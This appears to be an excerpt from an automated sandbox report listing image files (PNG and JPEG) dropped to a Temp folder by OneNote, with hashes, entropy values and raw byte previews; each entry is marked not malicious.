Preview:	.PNG........IHDR...U.........1x5.....PLTE....................................e........................................................s...............x..........................o..............................................................................................................................................................~.............................m...............................................j...............................................p.......z......................................................x..............\|........................................v.......................y..........................................................h...........................................................................P..{....bKGD....H....cmPPJCmp0712....H.s...(SIDATx^.}i@S..N....h...!..)....AI%..p.L."a..)..`U..,h..:O.b.:.j+.Z).b..zN.s..{O...&\|..N}...${....~.....k}.[k}{.o^.D_..W:35ly..7rL....6n0.A...b

C:\Users\user\AppData\Local\Temp\{379A8E05-8162-4A0A-A9EB-B1A1624443F9}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:13:06], progressive, precision 8, 570x779, components 3
Category:	dropped
Size (bytes):	129887
Entropy (8bit):	7.8877849553452695
Encrypted:	false
SSDEEP:	3072:QS1x1rXglsteJ79wHi4vNQR5yBlUdOSILe9hSj9jeWMPjdlOJ:vvglst1HiwWR5yBA2LeS9jd1
MD5:	737E96E41D79D3BDACE7AB4F8CBF6274
SHA1:	E6202A41A4F86B27D9EBCAEF7670B16C0ED67CF2
SHA-256:	7966F3D8A2D61ECB49A35E163781858E052C0B122A18A1238AFE27B57E2850E8
SHA-512:	D398C8521DB2FB3F8456FE792CF37472F3B851DD7298DB20E2DB79144F8E846D051878E77E5EF5D00E6840EDB90C6E2D97935BC1023A15FC45038CCE731E9895
Malicious:	false
Preview:	......JFIF.....H.H.....iExif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:13:06.............................:.......................................................&.(.................................3.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................u.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...W..I:......a....Aa ...w.T.M.v.........3x.......8Y....$.."-..m.I.0~sxB[@..=...:..\.Y?....@O.L;9i..U....?.5">+9.s\Z..vN

C:\Users\user\AppData\Local\Temp\{38FF7A0C-C44B-4EA0-B865-E4344863ADE9}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11449
Entropy (8bit):	7.91552812501629
Encrypted:	false
SSDEEP:	192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
MD5:	163E6791C87E4999C343EC5E23843B15
SHA1:	43CE3BAE19E22876483A7FD0E93DB45790373600
SHA-256:	DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
SHA-512:	98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....\|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E\|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.\|..\|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

C:\Users\user\AppData\Local\Temp\{3B0F66CC-68CD-478B-BDE2-83192D3D09CD}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4490
Entropy (8bit):	7.928016176674318
Encrypted:	false
SSDEEP:	96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
MD5:	7F161B19B937AB48D4FD2F6E5E16FDBD
SHA1:	BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
SHA-256:	C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
SHA-512:	E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
Malicious:	false
Preview:	.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.\|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.\|...\.z..6j>..n....Y.&G.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P.....'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^.....W..?}t...{.B.8..D...UPa..~..C...\|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.......G...K.....e...b.\|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

C:\Users\user\AppData\Local\Temp\{3DA3D1DE-E584-4302-AD94-3382C8A6E343}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1657
Entropy (8bit):	7.80882577056055
Encrypted:	false
SSDEEP:	24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
MD5:	D5F7A65469623327F799B516ACBFFD2F
SHA1:	76C6333C14AF3A7EA091819953E6E12DC289A12C
SHA-256:	F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
SHA-512:	351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
Malicious:	false
Preview:	.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..\|'.n.x...c....._O...[)......S..Q...d......A....4..t....E..v..}..7...t.b....,/\|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

C:\Users\user\AppData\Local\Temp\{3F4C81BA-FFDB-492F-921B-BCCD0654B4DA}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14458
Entropy (8bit):	7.944094738048628
Encrypted:	false
SSDEEP:	384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
MD5:	7CEB71F78A193F8C9F7FFDA5F81AEBD8
SHA1:	EEC1597705EFF1A527C246B86A71878185BA6B1B
SHA-256:	77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
SHA-512:	1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
Malicious:	false
Preview:	.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...dU...C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

C:\Users\user\AppData\Local\Temp\{3FFC27E0-FE09-435E-BB4C-EDD39E9A7FDB}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12824
Entropy (8bit):	7.974776104184905
Encrypted:	false
SSDEEP:	384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
MD5:	2628353534C5AD86CBFE57B6616D46DD
SHA1:	244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
SHA-256:	69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
SHA-512:	2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
Malicious:	false
Preview:	.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.\|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a\|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[\|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......\|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.\|. ......EC..............1.\

C:\Users\user\AppData\Local\Temp\{412D568F-A2A5-44D1-A546-3393F64299F5}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	17289
Entropy (8bit):	7.962998633267186
Encrypted:	false
SSDEEP:	384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
MD5:	708E8EB906BC105CCA0535AE669AA651
SHA1:	38D82DEDFE97D3001188C2E18FE13BD741FD520F
SHA-256:	1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
SHA-512:	1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }...B@....i<8.....B@.T2 .........xp..! .....d@...!......(B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'\|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

C:\Users\user\AppData\Local\Temp\{41FA16E1-7DA2-4798-9D85-51AF673C7364}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13737
Entropy (8bit):	7.916899917415529
Encrypted:	false
SSDEEP:	384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
MD5:	830632032C7DDBCCDE126F4BAE935540
SHA1:	9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
SHA-256:	2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
SHA-512:	5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
Malicious:	false
Preview:	.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

C:\Users\user\AppData\Local\Temp\{426C4AD8-F62B-47C5-8C4D-D9FC9EEB63DE}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	17289
Entropy (8bit):	7.962998633267186
Encrypted:	false
SSDEEP:	384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
MD5:	708E8EB906BC105CCA0535AE669AA651
SHA1:	38D82DEDFE97D3001188C2E18FE13BD741FD520F
SHA-256:	1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
SHA-512:	1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }...B@....i<8.....B@.T2 .........xp..! .....d@...!......(B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'\|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

C:\Users\user\AppData\Local\Temp\{433734AB-EAD3-4F54-AE12-4A966D1F8B8A}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	16003
Entropy (8bit):	7.959532793770661
Encrypted:	false
SSDEEP:	384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
MD5:	3A5CD52E925A7C4A345047D8F06C3C41
SHA1:	9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
SHA-256:	477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
SHA-512:	8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..\|.....+)..H..C.K... ....x).rU..T..E...;.....@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z.GJ...."@zJ}...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[\|\|...t.T.w .. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

C:\Users\user\AppData\Local\Temp\{44DCB131-7302-44C2-B2F0-8F3D8C368A05}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	8184
Entropy (8bit):	7.807848176906598
Encrypted:	false
SSDEEP:	192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
MD5:	5B386BF9A20766956A84F67F913F23D7
SHA1:	6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
SHA-256:	DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
SHA-512:	99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..\|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.\|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

C:\Users\user\AppData\Local\Temp\{44EF2DD4-F1BC-42C4-994A-4322E92E8AD5}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	14177
Entropy (8bit):	5.705782002886174
Encrypted:	false
SSDEEP:	192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
MD5:	7CDCE7EEBF795998DA6CAC11D363291C
SHA1:	183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
SHA-256:	DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
SHA-512:	560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E\|....,iOyD\|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}

C:\Users\user\AppData\Local\Temp\{45281967-CA82-4665-AA27-275502DEE55A}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1570
Entropy (8bit):	7.780157858994452
Encrypted:	false
SSDEEP:	48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
MD5:	EF9AA5B2ADBE5DF68AC4F4D716DF7708
SHA1:	363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
SHA-256:	3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
SHA-512:	EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
Malicious:	false
Preview:	.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.>.E,;.....~..\|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&............Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~\|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er\|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.\|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D\|3t.-\g...Q

C:\Users\user\AppData\Local\Temp\{471A89FE-0674-4D8C-A649-DB4538400C67}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 700x114, components 3
Category:	dropped
Size (bytes):	2266
Entropy (8bit):	5.563021222358941
Encrypted:	false
SSDEEP:	24:TuRCTP9rSTfIEe1HbcVY1YbDXq8eCI0bf2QQe0GVDQAzZw:aRCTN7HbcW1YbDXq+I07Ien0AVw
MD5:	DB8A181E3F0EAD4A9472099E42ED6BE3
SHA1:	92096AF05CC6167B1AA816811A1160B809393FA2
SHA-256:	E9746B4E9AE9CE7B3B0068779DB3E113E2DFC9880F25373D745D0E700E69A906
SHA-512:	A9E246E10E28D057090BA9F034ECE6131780D7F794C5C9421523388997C7EDFBB49BC32B863B6C6668911B359C304AA54969B48CB9234950D5CECD2A6F3EFFF8
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................... ! ..''**''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666......r...........................................5.......................!1AQ..2a...."Rq..#3BSr..C..................................................................?...X.....U...j...F.W.V]'KV.uWt.iT...{.......`.(.....V%..=.....z......V..ct+.U.B...@.............................................{.....5.........0...x4....c..;...........+......\|.7E.%.9.1+}..d.........+.V#.P.HUL.E...g.li...8.>U.";0pi.]5.\..zo..."@.........................................y.6.mLN..S.....@...i..A..p.......~\|V9.+.Xy.........+,L.....7Z7..p...-X...\.....:-...i....v.1...-..H....9.zk....l....^.......:.."^.t.Q.F...X..B..$............................................a.%f&3..1.5+.X..'b7bwr.).e.x....!...H...aa_..kD...b..g..p..K^.k..qX.[,.........Q...U..x...YMvj...w..:k.....j.W.8..4....c.u.}m.....o.=@.......j.S.t.\|.....5h.y.%.~...G

